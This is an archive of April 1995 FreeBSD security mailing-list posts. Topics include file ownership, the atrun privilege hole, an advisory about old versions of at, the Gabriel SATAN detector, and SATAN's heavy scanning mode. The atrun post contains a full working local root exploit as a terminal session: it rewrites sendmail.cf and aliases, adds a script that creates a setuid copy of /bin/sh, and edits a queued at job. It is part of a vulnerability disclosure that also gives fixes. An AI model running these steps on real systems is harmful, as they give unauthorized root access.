From owner-freebsd-security Sun Apr 2 09:19:49 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id JAA03443 for security-outgoing; Sun, 2 Apr 1995 09:19:49 -0700 Received: from ibp.ibp.fr (ibp.ibp.fr [132.227.60.30]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id JAA03437 for ; Sun, 2 Apr 1995 09:19:47 -0700 Received: from blaise.ibp.fr (blaise.ibp.fr [132.227.60.1]) by ibp.ibp.fr (8.6.12/jtpda-5.0) with SMTP id SAA21858 ; Sun, 2 Apr 1995 18:20:02 +0200 Received: by blaise.ibp.fr (4.1/SMI-4.1) id AA25615; Sun, 2 Apr 95 18:19:28 +0200 From: roberto@blaise.ibp.fr (Ollivier Robert) Message-Id: <9504021619.AA25615@blaise.ibp.fr> Subject: Re: root owning everything To: pst@Shockwave.COM (Paul Traina) Date: Sun, 2 Apr 1995 18:19:28 +0200 (MET DST) Cc: security@FreeBSD.org In-Reply-To: <199504011850.KAA15088@precipice.shockwave.com> from "Paul Traina" at Apr 1, 95 10:50:37 am X-Operating-System: FreeBSD 2.1.0-Development ctm#480 X-Mailer: ELM [version 2.4 PL23beta2] Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 428 Sender: security-owner@FreeBSD.org Precedence: bulk > Except for setuid files, the majority of files in / and /usr should be owned > by root, not bin, so that I can't nfsmount a volume read-write and su to > bin and have a party. My feelings too for a long time. Every directory on my machine are owned by root for the same reason. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@FreeBSD.ORG FreeBSD keltia 2.1.0-Development #7: Thu Mar 23 00:28:31 MET 1995 From owner-freebsd-security Sun Apr 2 13:30:15 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id NAA10354 for security-outgoing; Sun, 2 Apr 1995 13:30:15 -0700 Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.cdrom.com (8.6.10/8.6.6) with SMTP id NAA10347 for ; Sun, 2 Apr 1995 13:30:10 -0700 Received: by halloran-eldar.lcs.mit.edu; id AA21539; Sun, 2 Apr 1995 16:29:42 -0400 Date: Sun, 2 Apr 1995 16:29:42 -0400 From: Garrett Wollman Message-Id: <9504022029.AA21539@halloran-eldar.lcs.mit.edu> To: Paul Traina Cc: security@FreeBSD.org Subject: root owning everything In-Reply-To: <199504011850.KAA15088@precipice.shockwave.com> References: <199504011850.KAA15088@precipice.shockwave.com> Sender: security-owner@FreeBSD.org Precedence: bulk < said: > Except for setuid files, the majority of files in / and /usr should be owned > by root, not bin, so that I can't nfsmount a volume read-write and su to > bin and have a party. > An alternative would be to map uid bin to nobody the same way root is done. If you care about security, you'll map almost everybody to nobody in /etc/exports. I'm not sure if this works right now. -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. - Claude McKenzie + Florent Vollant From owner-freebsd-security Mon Apr 3 16:08:45 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id QAA23106 for security-outgoing; Mon, 3 Apr 1995 16:08:45 -0700 Received: from localhost (localhost [127.0.0.1]) by freefall.cdrom.com (8.6.10/8.6.6) with SMTP id QAA23094 for ; Mon, 3 Apr 1995 16:08:43 -0700 X-Authentication-Warning: freefall.cdrom.com: Host localhost didn't use HELO protocol Prev-Resent: Mon, 03 Apr 1995 16:08:42 -0700 Prev-Resent: "security " Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id PAA21655 for ; Mon, 3 Apr 1995 15:42:48 -0700 Received: from vivid.autometric.com by relay3.UU.NET with SMTP id QQyjxq24527; Mon, 3 Apr 1995 18:42:13 -0400 Received: from jester by vivid.autometric.com via SMTP (5.67a/920502.SGI) for @relay1.uu.net:jkh@freefall.cdrom.com id AA28310; Mon, 3 Apr 1995 18:42:11 -0400 Received: by jester (931110.SGI/930416.SGI) for @vivid.autometric.com:jkh@freefall.cdrom.com id AA18421; Mon, 3 Apr 95 18:42:09 -0400 From: "Brian Sletten" Message-Id: <9504031842.ZM18419@jester.autometric.com> Date: Mon, 3 Apr 1995 18:42:08 -0400 Reply-To: bsletten@vivid.autometric.com X-Face: wFVAbzw-w(WA1~gdgaj^'c4X=P$j`q.EhNcjpxyW+:1qDq-ZCx[bvPi=^O$EC39vA5Vk,XC w2VGxhaJxS"^{ab.}G%vXO0E+sx--{<:#TsC@<5#W#PfVq{,i)^X{U7HkF;nI0"mj0fvb1(DvS@_H8 u`r3)}"3Af3vuz Resent-From: "Jordan K. Hubbard" Sender: security-owner@FreeBSD.org Precedence: bulk I remember some discussion not too long about about the securedist features and international users. I was just told by someone that Phil Zimmerman was indicted today on exporting munitions charges. You might want to make sure that similar issues are not involved with providing the securedist via ftp from freefall.... Just thought I'd let you know. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Brian J. Sletten 2905 Wickersham Way, #202 (703) 658-4178 (O) bsletten@autometric.com Falls Church, VA 22042 (703) 207-9377 (H) The opposite of a profound truth may well be another profound truth. ##Bohr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From owner-freebsd-security Tue Apr 4 06:27:58 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id GAA12441 for security-outgoing; Tue, 4 Apr 1995 06:27:58 -0700 Received: from taurus.math.tau.ac.il (taurus.math.tau.ac.il [132.67.64.4]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id GAA12363 for ; Tue, 4 Apr 1995 06:23:02 -0700 Received: from lune.math.tau.ac.il (adam@lune.math.tau.ac.il [132.67.96.11]) by taurus.math.tau.ac.il (8.6.10/8.6.10) with ESMTP id PAA28587 for ; Tue, 4 Apr 1995 15:20:46 +0200 From: adam Received: (adam@localhost) by lune.math.tau.ac.il (8.6.9/8.6.9) id QAA09588 for freebsd-security@FreeBSD.org; Tue, 4 Apr 1995 16:20:44 +0300 Message-Id: <199504041320.QAA09588@lune.math.tau.ac.il> Subject: atrun hole To: freebsd-security@FreeBSD.org Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300) X-Sender: adam@math.tau.ac.il X-Organization: DIS WHEEL SHALL EXPL0DEX-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 3951 Sender: security-owner@FreeBSD.org Precedence: bulk There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily. First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passess it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*. However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below. The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in. The author of the program, Thomas Koenig , has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program. ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz He writes -- ``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.'' And, later -- Subject: Re: atrun hole To: adam@math.tau.ac.il (adam) Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST) In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 324 An additional thought... If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them. Please feel free to forward this as appropriate. Thomas Koenig === The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a. 5:53pm [eden:~] % whoami adam 5:53pm [eden:~] % cd /tmp 5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c 5:54pm [eden:/tmp] % cat > aliases postmaster: "|/tmp/rootme" root: "|/tmp/rootme" adam: "|/tmp/rootme" ^D 5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp /tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total 5:55pm [eden:/tmp] % cat > rootme #!/bin/sh /bin/cp /bin/sh /tmp/sh /bin/chmod 6777 /tmp/sh ^D 5:55pm [eden:/tmp] % chmod 755 rootme 5:56pm [eden:/tmp] % at now + 1 min fooz ^D Job a00ca9a79.000 will be executed using /bin/sh 5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000 5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000 #! /bin/sh # mail -C/tmp/c 1 umask 22 HOME=\/home\/adam; export HOME SHELL=\/usr\/local\/bin\/tcsh; export SHELL LOGNAME=adam; export LOGNAME USER=adam; export USER PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH HOSTTYPE=FreeBSD; export HOSTTYPE VENDOR=intel; export VENDOR OSTYPE=FreeBSD; export OSTYPE MACHTYPE=i386; export MACHTYPE SHLVL=1; export SHLVL PWD=\/tmp; export PWD HOST=eden; export HOST PAGER=less; export PAGER VISUAL=joe; export VISUAL MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH cd /tmp fooz 5:56pm [eden:/tmp] % sleep 240 DING! [eden:/tmp] % /tmp/sh # whoami root From owner-freebsd-security Tue Apr 4 06:29:08 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id GAA12471 for security-outgoing; Tue, 4 Apr 1995 06:29:08 -0700 Received: from nz11.rz.uni-karlsruhe.de (nz11.rz.uni-karlsruhe.de [129.13.64.7]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id GAA12464 for ; Tue, 4 Apr 1995 06:28:55 -0700 Received: from mvmampc66.ciw.uni-karlsruhe.de by nz11.rz.uni-karlsruhe.de with SMTP (PP); Tue, 4 Apr 1995 15:28:23 +0200 Received: (from ig25@localhost) by mvmampc66.ciw.uni-karlsruhe.de (8.6.9/8.6.9) id PAA03260 for freebsd-security@freebsd.org; Tue, 4 Apr 1995 15:28:15 +0200 Message-Id: <199504041328.PAA03260@mvmampc66.ciw.uni-karlsruhe.de> Subject: security hole in old versions of at for Linux (fwd) To: freebsd-security@FreeBSD.org Date: Tue, 4 Apr 1995 15:28:14 +0200 (MET DST) From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1555 Sender: security-owner@FreeBSD.org Precedence: bulk I sent out the following message yesterday to the linux-security list. The bug I described (for which I also got a full exploitation script, which I'm not releasing at present) appears to be in the current FreeBSD distributions. It would appear that this is the (older) version of at/atrun, version 2.5 or thereabouts, which I released under a BSD-style copyright specifically for inclusion in FreeBSD. Since 2.7a has this bug fixed, it would be advisable to upgrade ASAP. For the record, I give the FreeBSD maintainers explicit permission to slap the same copyright I released their current version under on 2.7a. It can be found in the usual Linux places, such as sunsite.unc.edu. [Please CC: me any reply; I don't subscribe to any FreeBSD list] Thomas > I've just been informed that earlier versions of my at/atrun package > for Linux had a bug which allowed root access for any authorized user > of the system. > > This bug can only be exploited if the user can edit a job he's > submitted to the atrun queue. > > If 'at -V' shows a version earlier than 2.7, or if the directory > /var/spool/atjobs (or, possibly, /usr/spool/atjobs) is world - executable, > you are vulnerable. > > In that case, upgrade your system to at 2.7 or 2.7a immediately. > > In the meantime, changing the permissions of /var/spool/atjobs to 700 > will prevent unauthorized root access; this may also render the > 'at' system unusable. > > Non - vulnerable versions of at have been around for about 10 > months, and have been included in the standard distributions. From owner-freebsd-security Thu Apr 6 08:17:56 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id IAA29460 for security-outgoing; Thu, 6 Apr 1995 08:17:56 -0700 Received: from sovcom.kiae.su (sovcom.kiae.su [144.206.136.1]) by freefall.cdrom.com (8.6.10/8.6.6) with SMTP id IAA29454 for ; Thu, 6 Apr 1995 08:17:53 -0700 Received: by sovcom.kiae.su id AA00787 (5.65.kiae-2 for security@freebsd.org); Thu, 6 Apr 1995 19:15:12 +0400 Received: by sovcom.KIAE.su (UUMAIL/2.0); Thu, 6 Apr 95 19:15:08 +0300 Received: (from ache@localhost) by astral.msk.su (8.6.8/8.6.6) id TAA02718 for security@freebsd.org; Thu, 6 Apr 1995 19:04:54 +0400 To: security@FreeBSD.org References: <199504041320.QAA09588@lune.math.tau.ac.il> In-Reply-To: <199504041320.QAA09588@lune.math.tau.ac.il>; from adam at Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300) Message-Id: Organization: Olahm Ha-Yetzirah Date: Thu, 6 Apr 1995 19:04:53 +0400 X-Mailer: Mail/@ [v2.32 FreeBSD] From: "Andrey A. Chernov, Black Mage" X-Class: Fast Subject: Re: atrun hole Lines: 6 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Length: 330 Sender: security-owner@FreeBSD.org Precedence: bulk Does anybody already pick this work? -- Andrey A. Chernov : And I rest so composedly, /Now, in my bed, ache@astral.msk.su : That any beholder /Might fancy me dead - FidoNet: 2:5020/230.3 : Might start at beholding me, /Thinking me dead. RELCOM Team,FreeBSD Team : E.A.Poe From "For Annie" 1849 From owner-freebsd-security Thu Apr 6 18:03:17 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id SAA16911 for security-outgoing; Thu, 6 Apr 1995 18:03:17 -0700 Received: from sequent.kiae.su (sequent.kiae.su [144.206.136.6]) by freefall.cdrom.com (8.6.10/8.6.6) with SMTP id SAA16904 for ; Thu, 6 Apr 1995 18:03:14 -0700 Received: from newcom.kiae.su by sequent.kiae.su with SMTP id AA29302 (5.65.kiae-2 for ); Fri, 7 Apr 1995 03:51:08 +0300 Received: by newcom.kiae.su id AA27453 (5.65.kiae-1 for security@freebsd.org); Fri, 7 Apr 1995 04:47:00 +0400 Date: Fri, 7 Apr 1995 04:47:00 +0400 Message-Id: <199504070047.AA27453@newcom.kiae.su> To: security@FreeBSD.org Subject: Announcing GABRIEL - Free SATAN Detector From: "Andrey A. Chernov, Black Mage" Organization: Olahm Ha-Yetzirah X-Class: Fast X-Newsreader: NN v6.4.18 Sender: security-owner@FreeBSD.org Precedence: bulk >Newsgroups: comp.security.unix >Path: kiae!relcom!KremlSun!fagot.turbo.nsk.su!nsu.nsk.su!alpha.phys.msu.su!Radio-MSU.net!dscomsa.desy.de!CERN.ch!EU.net!howland.reston.ans.net!spool.mu.edu!usenet.eel.ufl.edu!news.mathworks.com!newshost.marcam.com!uunet!sparky!kwiudl.kwi.com!netcomsv!uucp3.netcom.com!atlas!lat >From: lat@lat.com (Los Altos Technologies) >Subject: Announcing GABRIEL - Free SATAN Detector >Message-ID: >Keywords: SATAN, Gabriel >Organization: Los Altos Technologies, Inc. >Date: Thu, 6 Apr 1995 07:07:49 GMT >Lines: 115 Los Altos Technologies, Inc. has released Gabriel, a free SATAN detector. Gabriel gives the system administrator an early warning of a possible network intrusion by detecting and identifying unauthorized network probing. Gabriel is complete and ready to run software that does not require Perl or any other public domain programs. Gabriel's highlights: Ready to run for Sun Solaris1 and Solaris2 operating systems. Full source included. Perl IS NOT required. Test script included to simplify evaluation of Gabriel. Built-in mechanism to send real-time alerts via pager, phone call, email, or online displays. Gabriel comes with: gabriel_client - Reports to gabriel_server excessive probing of any host on its network segment. gabriel_server - Gathers data from clients and notifies administrator via email, pager, etc. install_gabriel_clients - Single script to install and start client monitor programs network-wide. install_gabriel_server - Installs the server program. ----------------------------------------- | Via the World Wide Web: | | http://www.lat.com | | ftp://ftp.best.com/pub/lat | | | | Via FTP: | | ftp.lat.com | ----------------------------------------- To join the Gabriel mailing list: Send mail to "Majordomo@lat.com" with the command "subscribe gabriel" in the body of the email message. WHAT IS GABRIEL? As a public service, Los Altos Technologies, Inc., a provider of Unix security software, has developed and released a free SATAN detector called Gabriel(tm). Gabriel gives the system administrator an early warning of possible network intrusions by detecting and identifying SATAN's network probing. Gabriel is a complete and ready to run package that DOES NOT require Perl or any other software or libraries. HOW MUCH DOES IT COST? We are providing Gabriel at no charge to our customers or anyone else who wishes to use it, subject to the terms explained in the COPYRIGHT file. WHY DID LOS ALTOS TECHNOLOGIES CREATE GABRIEL? We are deeply concerned with network security and the possible negative effects of SATAN and other network probing software. By combining SATAN with Gabriel, a system administrator can get all the benefits of running authorized SATAN scans without the risks of unauthorized and undetected network probing. HOW IS IT SUPPORTED? HOW DO I JOIN THE MAILING LIST? It is expected that future updates, enhancements and revisions will come from the users' group. To subscribe to the users' group mailing list, send a message to "majordomo@lat.com" with any subject line, and inside the body of the message include the line "subscribe gabriel". WHERE IS THE LATEST VERSION? You can get the latest version via World Wide Web or ftp. http://www.lat.com ftp://ftp.best.com/pub/lat HOW DO I MAKE GABRIEL FROM SOURCE CODE? Gabriel includes pre-compiled binaries for Solaris 1.x and Solaris 2.x, so you do not need to build it from source. If you wish to compile it execute "make all" and follow the directions. HOW DO I INSTALL AND EVALUATE GABRIEL? Follow the directions in the manual page, gabriel.8. You can print this file using "troff -man -t gabriel.8 | lpr -t", or just look at gabriel.txt. Basically, you just run the server install script, and then the client install script. ====================================================================== Los Altos Technologies, Inc. 2111 Grant Rd, Los Altos, CA 94024 Phone: 415/988-4848 Fax: 415/988-4860 Email: info@lat.com From owner-freebsd-security Sat Apr 8 09:55:36 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id JAA18560 for security-outgoing; Sat, 8 Apr 1995 09:55:36 -0700 Received: from ns1.win.net (ns1.win.net [204.215.209.3]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id JAA18554 for ; Sat, 8 Apr 1995 09:55:34 -0700 Received: (from bugs@localhost) by ns1.win.net (8.6.9/8.6.9) id MAA29650 for freebsd-security@freebsd.org; Sat, 8 Apr 1995 12:58:57 -0400 From: Mark Hittinger Message-Id: <199504081658.MAA29650@ns1.win.net> Subject: satan "heavy" mode attacks To: freebsd-security@FreeBSD.org Date: Sat, 8 Apr 1995 12:58:56 -0400 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 416 Sender: security-owner@FreeBSD.org Precedence: bulk I've just read that some sites are reporting that using satan in its "heavy" mode will overload an inetd and make it toss its cookies. There are reports that the activity also causes some firewall products to consume available memory and discontinue logging some things. We probably need to double check our inetd and make sure it can deal with the resource overload issue. Regards, Mark Hittinger bugs@win.net From owner-freebsd-security Sat Apr 8 15:41:45 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id PAA28284 for security-outgoing; Sat, 8 Apr 1995 15:41:45 -0700 Received: from irbs.com ([199.182.75.129]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id PAA28278 for ; Sat, 8 Apr 1995 15:41:42 -0700 Received: (from jc@localhost) by irbs.com (8.6.11/8.6.6) id SAA00738 for freebsd-security@freebsd.org; Sat, 8 Apr 1995 18:41:39 -0400 From: John Capo Message-Id: <199504082241.SAA00738@irbs.com> Subject: Re: satan "heavy" mode attacks To: freebsd-security@FreeBSD.org Date: Sat, 8 Apr 1995 18:41:39 -0400 (EDT) In-Reply-To: <199504081658.MAA29650@ns1.win.net> from "Mark Hittinger" at Apr 8, 95 12:58:56 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 561 Sender: security-owner@FreeBSD.org Precedence: bulk Mark Hittinger writes: > > > I've just read that some sites are reporting that using satan in its "heavy" > mode will overload an inetd and make it toss its cookies. > > There are reports that the activity also causes some firewall products to > consume available memory and discontinue logging some things. > > We probably need to double check our inetd and make sure it can deal with > the resource overload issue. > I have run the "heavy" Satan against four -current systems and three 1.1.5.1 systems and they survived just fine. YMMV :-) John Capo